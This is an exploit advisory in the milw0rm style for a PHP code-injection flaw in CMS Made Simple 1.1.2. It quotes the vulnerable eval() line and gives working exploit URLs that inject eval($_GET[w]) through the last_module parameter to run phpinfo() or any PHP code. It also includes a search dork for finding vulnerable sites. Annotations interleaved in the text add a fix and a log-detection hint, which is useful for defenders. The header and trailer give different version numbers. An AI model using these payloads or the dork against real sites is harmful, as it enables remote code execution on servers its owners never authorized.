1 # o [bug] /"*._ _ #
2 # . . . .−*’‘ ‘*−.._.−’/ #
3 # o o < * )) , ( #
4 # . o ‘*−._‘._(__.−−*"‘.\ #
5 # #
6 # vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
7 # author: irk4z@yahoo.pl #
8 # download: #
9 http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #
10 # dork: "powered by CMS Made Simple version 1.1.2" #
11 # greetz: cOndemned, kacper, str0ke #
12
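13 # code:
14
15 /lib/adodb_lite/adodb-perf-module.inc.php:
16 ...
17 eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
18 ...
# note: $last_module is concatenated into the string handed to eval() with no validation.
# The request below supplies it as a query parameter to the include file itself, so the
# value is presumably caller-controlled whenever the file is directly reachable and the
# variable is not initialised first (e.g. register_globals on; not shown in this excerpt).
# fix: deny direct web access to the lib/ include files, initialise $last_module inside the
# file and accept only known module names, or replace the eval() with a static class definition.
# detection: web-server log entries requesting adodb-perf-module.inc.php with a last_module parameter.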
19
20 # exploit:
21
22 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20
zZz_ADOConnection{}//&w=phpinfo();
23 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20
zZz_ADOConnection{}//&w=[ PHPCODE ]
24
25 # milw0rm.com [2007-09-21]
CMS Made Simple 1.2 Remote Code Execution Vulnerability
irk4z
09/21/2007